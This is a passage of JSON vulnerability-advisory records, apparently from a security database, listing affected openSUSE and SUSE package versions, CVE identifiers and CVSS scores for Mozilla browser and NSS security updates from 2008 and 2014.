"10.1", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.8.1.17-0.1", "packageName": "mozilla-xulrunner181-32bit", "packageFilename": "mozilla-xulrunner181-32bit-1.8.1.17-0.1.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-mail", "packageFilename": "seamonkey-mail-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-dom-inspector", "packageFilename": "mozilla-dom-inspector-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox-translations", "packageFilename": "MozillaFirefox-translations-2.0.0.17-0.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.3-1.1", "packageName": "MozillaFirefox-translations", "packageFilename": "MozillaFirefox-translations-3.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.8.1.17-0.1", "packageName": "mozilla-xulrunner181-l10n", "packageFilename": "mozilla-xulrunner181-l10n-1.8.1.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox", "packageFilename": "MozillaFirefox-2.0.0.17-0.3.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-mail", "packageFilename": "mozilla-mail-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.s390x.rpm", "arch": "s390x", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-mail", "packageFilename": "mozilla-mail-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.16.1-34", "packageName": "epiphany", "packageFilename": "epiphany-2.16.1-34.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaFirefox", "packageFilename": "MozillaFirefox-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaFirefox-translations", "packageFilename": "MozillaFirefox-translations-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.3", "packageName": "MozillaFirefox-debuginfo", "packageFilename": "MozillaFirefox-debuginfo-2.0.0.17-0.3.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-venkman", "packageFilename": "mozilla-venkman-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-spellchecker", "packageFilename": "seamonkey-spellchecker-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.8.1.13-22.1", "packageName": "mozilla-xulrunner181-debugsource", "packageFilename": "mozilla-xulrunner181-debugsource-1.8.1.13-22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.7.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.20.0-8.5", "packageName": "epiphany", "packageFilename": "epiphany-2.20.0-8.5.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.1", "packageVersion": "1.8.0.14eol-0.7", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.7.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.80_seamonkey_1.0.4-10", "packageName": "mozilla-hu", "packageFilename": "mozilla-hu-1.80_seamonkey_1.0.4-10.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.80_seamonkey_1.0.4-9", "packageName": "mozilla-hu", "packageFilename": "mozilla-hu-1.80_seamonkey_1.0.4-9.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.9.0.3-1.1", "packageName": "mozilla-xulrunner190", "packageFilename": "mozilla-xulrunner190-1.9.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE SUSE Linux Enterprise Software Development Kit", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "gecko-sdk", "packageFilename": "gecko-sdk-1.8.0.14eol-0.9.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "mozilla-xulrunner-32bit", "packageFilename": "mozilla-xulrunner-32bit-1.8.0.14eol-0.7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "3.0.3-1.1", "packageName": "MozillaFirefox", "packageFilename": "MozillaFirefox-3.0.3-1.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.9.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.22.1.1-25.1", "packageName": "epiphany-doc", "packageFilename": "epiphany-doc-2.22.1.1-25.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.7.x86_64.rpm", "arch": "x86_64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.0.0.17-0.1", "packageName": "MozillaFirefox", "packageFilename": "MozillaFirefox-2.0.0.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.20.0-8.5", "packageName": "epiphany-doc", "packageFilename": "epiphany-doc-2.20.0-8.5.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.4-0.12", "packageName": "mozilla-cs", "packageFilename": "mozilla-cs-1.8_seamonkey_1.0.4-0.12.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "1.8.1.13-22.1", "packageName": "mozilla-xulrunner181-l10n", "packageFilename": "mozilla-xulrunner181-l10n-1.8.1.13-22.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.22.0-37.1", "packageName": "epiphany-extensions-debugsource", "packageFilename": "epiphany-extensions-debugsource-2.22.0-37.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-calendar", "packageFilename": "mozilla-calendar-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "1.8.1.17-0.1", "packageName": "mozilla-xulrunner181", "packageFilename": "mozilla-xulrunner181-1.8.1.17-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.7.ppc.rpm", "arch": "ppc", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-calendar", "packageFilename": "mozilla-calendar-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.0", "packageVersion": "2.22.1.1-25.1", "packageName": "epiphany-debugsource", "packageFilename": "epiphany-debugsource-2.22.1.1-25.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.3", "packageVersion": "2.20.0-8.5", "packageName": "epiphany-extensions", "packageFilename": "epiphany-extensions-2.20.0-8.5.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.7", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.7.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "2.16.1-34", "packageName": "epiphany-devel", "packageFilename": "epiphany-devel-2.16.1-34.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.80_seamonkey_1.0.4-9", "packageName": "mozilla-hu", "packageFilename": "mozilla-hu-1.80_seamonkey_1.0.4-9.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Open Enterprise Server (OES)", "OSVersion": "any", "packageVersion": "1.8_seamonkey_1.0.9-1.17", "packageName": "mozilla-calendar", "packageFilename": "mozilla-calendar-1.8_seamonkey_1.0.9-1.17.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "SUSE Linux Enterprise Server", "OSVersion": "10.2", "packageVersion": "1.8.0.14eol-0.9", "packageName": "mozilla-xulrunner", "packageFilename": "mozilla-xulrunner-1.8.0.14eol-0.9.ia64.rpm", "arch": "ia64", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "10.2", "packageVersion": "1.1.12-0.1", "packageName": "seamonkey-venkman", "packageFilename": "seamonkey-venkman-1.1.12-0.1.i586.rpm", "arch": "i586", "operator": "lt"}, {"OS": "Novell Linux Point of Service", "OSVersion": "9", "packageVersion": "1.8_seamonkey_1.0.9-1.15", "packageName": "mozilla-dom-inspector", "packageFilename": "mozilla-dom-inspector-1.8_seamonkey_1.0.9-1.15.i586.rpm", "arch": "i586", "operator": "lt"}], "description": "The Mozilla suite of programs was updated to fix various security problems and bugs.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2008-10-08T17:24:56", "enchantments": {"score": {"vector": "NONE", "value": 9.3}}, "type": "suse", "title": "remote code execution in MozillaFirefox,MozillaThunderbird,seamonkey,mozilla", "bulletinFamily": "unix", "cvelist": ["CVE-2008-3835", "CVE-2008-4063", "CVE-2008-4070", "CVE-2008-4067", "CVE-2008-3836", "CVE-2008-4066", "CVE-2008-4069", "CVE-2008-0016", "CVE-2008-4059", "CVE-2008-3837", "CVE-2008-4062", "CVE-2008-4060", "CVE-2008-4058", "CVE-2008-4068", "CVE-2008-4064", "CVE-2008-4061", "CVE-2008-4065"], "modified": "2008-10-08T17:24:56", "id": "SUSE-SA:2008:050", "href": "http://lists.opensuse.org/opensuse-security-announce/2008-10/msg00005.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:21:58", "references": ["https://bugzilla.novell.com/887746", "https://bugzilla.novell.com/603356", "https://bugzilla.novell.com/750044", "https://bugzilla.novell.com/765204", "https://bugzilla.novell.com/637303", "https://bugzilla.novell.com/861847", "https://bugzilla.novell.com/808243", "https://bugzilla.novell.com/528406", "https://bugzilla.novell.com/664211", "https://bugzilla.novell.com/657016", "https://bugzilla.novell.com/667155", "https://bugzilla.novell.com/771583", "https://bugzilla.novell.com/894201", "https://bugzilla.novell.com/825935", "https://bugzilla.novell.com/642502", "https://bugzilla.novell.com/720264", "https://bugzilla.novell.com/41903", "https://bugzilla.novell.com/104586", "https://bugzilla.novell.com/737533", "https://bugzilla.novell.com/881874", "https://bugzilla.novell.com/503151", "https://bugzilla.novell.com/726758", "https://bugzilla.novell.com/868603", "https://bugzilla.novell.com/593807", "https://bugzilla.novell.com/649492", "https://bugzilla.novell.com/622506", "https://bugzilla.novell.com/576969", "https://bugzilla.novell.com/796895", "https://bugzilla.novell.com/689281", "https://bugzilla.novell.com/354469", "https://bugzilla.novell.com/840485", "https://bugzilla.novell.com/847708", "https://bugzilla.novell.com/701296", "https://bugzilla.novell.com/744275", "https://bugzilla.novell.com/385739", "https://bugzilla.novell.com/790140", "https://bugzilla.novell.com/894370", "https://bugzilla.novell.com/529180", "https://bugzilla.novell.com/417869", "https://bugzilla.novell.com/429179", "https://bugzilla.novell.com/747328", "https://bugzilla.novell.com/712224", "https://bugzilla.novell.com/758408", "https://bugzilla.novell.com/559819", "https://bugzilla.novell.com/441084", "https://bugzilla.novell.com/455804", "https://bugzilla.novell.com/876833", "https://bugzilla.novell.com/804248", "https://bugzilla.novell.com/390992", "https://bugzilla.novell.com/819204", "https://bugzilla.novell.com/733002", "https://bugzilla.novell.com/777588", "https://bugzilla.novell.com/854370", "https://bugzilla.novell.com/484321", "https://bugzilla.novell.com/786522", "https://bugzilla.novell.com/582276", "https://bugzilla.novell.com/527418", "https://bugzilla.novell.com/732898", "https://bugzilla.novell.com/755060", "https://bugzilla.novell.com/714931", "https://bugzilla.novell.com/749440", "https://bugzilla.novell.com/833389", "https://bugzilla.novell.com/783533", "https://bugzilla.novell.com/728520", "https://bugzilla.novell.com/813026", "https://bugzilla.novell.com/439841", "https://bugzilla.novell.com/746616", "https://bugzilla.novell.com/518603", "https://bugzilla.novell.com/542809", "https://bugzilla.novell.com/645315", "https://bugzilla.novell.com/875378", "https://bugzilla.novell.com/586567"], "affectedPackage": [{"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "libfreebl3-3.16.4-94.1.i586.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-translations-other-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-debuginfo-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libfreebl3-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "libfreebl3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-tools", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "libsoftokn3-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "libsoftokn3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libfreebl3-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "libfreebl3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-devel-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "libsoftokn3-x86-3.16.4-94.1.ia64.rpm", "packageName": "libsoftokn3-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-certs-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-certs-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-certs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-sysinit-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-sysinit-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-certs-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-debugsource-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-other-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-translations-other", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-certs-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-certs", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-buildsymbols-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libsoftokn3-3.16.4-94.1.x86_64.rpm", "packageName": "libsoftokn3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-sysinit-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-sysinit-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "libfreebl3-x86-3.16.4-94.1.ia64.rpm", "packageName": "libfreebl3-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libsoftokn3-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "libsoftokn3-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-certs-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-certs-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "libfreebl3-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "libfreebl3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-debugsource-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-certs-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "libfreebl3-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "libfreebl3-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-certs-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-certs-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "libsoftokn3-3.16.4-94.1.i586.rpm", "packageName": "libsoftokn3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libfreebl3-3.16.4-94.1.x86_64.rpm", "packageName": "libfreebl3", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-tools-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-debugsource-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-branding-upstream-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-devel-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-tools-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-tools-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libsoftokn3-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "libsoftokn3-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-buildsymbols-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox-buildsymbols", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-devel-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-translations-common-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-translations-common", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-debugsource-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-debugsource", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "i586", "packageFilename": "mozilla-nss-sysinit-debuginfo-3.16.4-94.1.i586.rpm", "packageName": "mozilla-nss-sysinit-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "i586", "packageFilename": "MozillaFirefox-branding-upstream-24.8.0-127.1.i586.rpm", "packageName": "MozillaFirefox-branding-upstream", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": "MozillaFirefox-24.8.0-127.1.x86_64.rpm", "packageName": "MozillaFirefox", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libfreebl3-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "libfreebl3-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "libsoftokn3-debuginfo-32bit-3.16.4-94.1.x86_64.rpm", "packageName": "libsoftokn3-debuginfo-32bit", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "x86_64", "packageFilename": "mozilla-nss-sysinit-debuginfo-3.16.4-94.1.x86_64.rpm", "packageName": "mozilla-nss-sysinit-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "mozilla-nss-certs-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "mozilla-nss-certs-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "3.16.4-94.1", "arch": "ia64", "packageFilename": "libsoftokn3-debuginfo-x86-3.16.4-94.1.ia64.rpm", "packageName": "libsoftokn3-debuginfo-x86", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.4", "packageVersion": "24.8.0-127.1", "arch": "x86_64", "packageFilename": 